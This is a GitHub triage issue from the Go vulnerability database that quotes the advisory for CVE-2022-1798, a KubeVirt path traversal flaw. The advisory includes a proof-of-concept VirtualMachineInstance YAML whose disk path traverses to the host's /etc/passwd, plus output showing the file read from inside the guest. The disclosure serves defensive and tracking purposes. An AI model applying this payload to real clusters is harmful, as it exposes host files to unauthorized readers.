Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

x/vulndb: potential Go vuln in kubevirt.io/kubevirt: CVE-2022-1798, GHSA-cvx8-ppmc-78hm #954

Closed
julieqiu opened this issue Aug 22, 2022 · 2 comments
Closed

x/vulndb: potential Go vuln in kubevirt.io/kubevirt: CVE-2022-1798, GHSA-cvx8-ppmc-78hm #954

julieqiu opened this issue Aug 22, 2022 · 2 comments
Labels
excluded: NOT_IMPORTABLE This vulnerability only exists in a binary and is not importable.

Comments

@julieqiu
Copy link
Member

In GitHub Security Advisory GHSA-cvx8-ppmc-78hm, there is a vulnerability in the following Go packages or modules:

Unit Fixed Vulnerable Ranges
kubevirt.io/kubevirt <= 0.53

See doc/triage.md for instructions on how to triage this report.

modules:
  - module: TODO
    versions:
      - {}
    packages:
      - package: kubevirt.io/kubevirt
description: "**Summary**\nAs part of a Kubevirt audit performed by NCC group, a finding
    dealing with systemic lack of path sanitization which leads to a path traversal
    was identified.  Google tested the exploitability of the paths in the audit report
    and identified that when combined with another vulnerability one of the paths
    leads to an arbitrary file read on the host from the VM.\n\nThe read operations
    are limited to files which are publicly readable or which are readable for UID
    107 or GID 107. /proc/self/<> is not accessible.\n\n**Severity**\n\nModerate -
    The vulnerability is proven to exist in an open source version of KubeVirt by
    NCC Group while being combined with Systemic Lack of Path Sanitization, which
    leads to Path traversal.\n\n**Proof of Concept**\n\nThe initial VMI specifications
    can be written as such to reproduce the issue:\n\n```\n\napiVersion: kubevirt.io/v1\nkind:
    VirtualMachineInstance\nmetadata:\n  name: vmi-fedora\nspec:\n  domain:\n    devices:\n
    \     disks:\n      - disk:\n          bus: virtio\n        name: containerdisk\n
    \     - disk:\n          bus: virtio\n        name: cloudinitdisk\n      - disk:\n
    \         bus: virtio\n        name: containerdisk1\n      rng: {}\n    resources:\n
    \     requests:\n        memory: 1024M\n  terminationGracePeriodSeconds: 0\n  volumes:\n
    \ - containerDisk:\n      image: quay.io/kubevirt/cirros-container-disk-demo:v0.52.0\n
    \   name: containerdisk\n  - containerDisk:\n      image: quay.io/kubevirt/cirros-container-disk-demo:v0.52.0\n
    \     path: test3/../../../../../../../../etc/passwd\n    name: containerdisk1\n
    \ - cloudInitNoCloud:\n      userData: |\n        #!/bin/sh\n        echo 'just
    something to make cirros happy'\n    name: cloudinitdisk\n\n\n```\nThe VMI can
    then be started through kubectl apply -f vm-test-ncc.yaml.\nThe requested file
    is accessible once the VM is up and can be accessed under /dev/vdc.\n\nDepending
    on the environment, path may contain more or less /.., something that can easily
    be tested by checking the events until the VMI can start without failure.\nRestrictions
    \n\nSELinux may mitigate this vulnerability.\n\nWhen using a node with selinux,
    selinux denies the access and the VM start was aborted:\n\n```\n\n19s         Warning
    \  SyncFailed                virtualmachineinstance/vmi-fedora    server error.
    command SyncVMI failed: \"preparing ephemeral container disk images failed: stat
    /var/run/kubevirt/container-disks/disk_0.img: permission denied\"\n\ntype=AVC
    msg=audit(1651828898.296:1266): avc:  denied  { setattr } for  pid=44402 comm=\"rpc-worker\"
    name=\"passwd\" dev=\"vda1\" ino=691477 scontext=system_u:system_r:virt_launcher.process:s0:c255,c849
    tcontext=system_u:object_r:passwd_file_t:s0 tclass=file permissive=1\n\n```\n\nAfter
    making selinux permissive the VM can boot and access /etc/passwd from the node
    within the guest:\n\n```\n\n$ sudo cat /dev/vdc\nroot:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nadm:x:3:4:adm:/var/adm:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\n[...]\n\n```\n\n**Further
    Analysis**\nIn order to mitigate this vulnerability, Sanitize imagePath in pkg/container-disk/container-disk.go
    following ISE best practices described and Add checks in pkg/virt-api/webhooks/validating-webhook/admitters/vmi-create-admitter.go\n\n**Timeline**\nDate
    reported: 05/10/2022\nDate fixed: N/A\nDate disclosed: 08/08/2022"
published: 2022-08-18T19:02:18Z
last_modified: 2022-08-19T17:10:16Z
cves:
  - CVE-2022-1798
ghsas:
  - GHSA-cvx8-ppmc-78hm
links:
    context:
      - https://github.com/advisories/GHSA-cvx8-ppmc-78hm
@julieqiu julieqiu added NeedsTriage excluded: NOT_IMPORTABLE This vulnerability only exists in a binary and is not importable. and removed NeedsTriage labels Aug 22, 2022
@julieqiu
Copy link
Member Author

This is a tool: https://github.com/kubevirt/kubevirt/blob/bcfbd78d803e9868e0665b51878a2a093e9b74c2/docs/getting-started.md

@GoVulnBot GoVulnBot mentioned this issue Apr 3, 2024
Closed
This was referenced Apr 24, 2024
Closed
Closed
@GoVulnBot GoVulnBot mentioned this issue May 3, 2024
Closed
@gopherbot
Copy link
Contributor

Change https://go.dev/cl/592773 mentions this issue: data/reports: unexclude 50 reports

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
excluded: NOT_IMPORTABLE This vulnerability only exists in a binary and is not importable.
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@julieqiu @gopherbot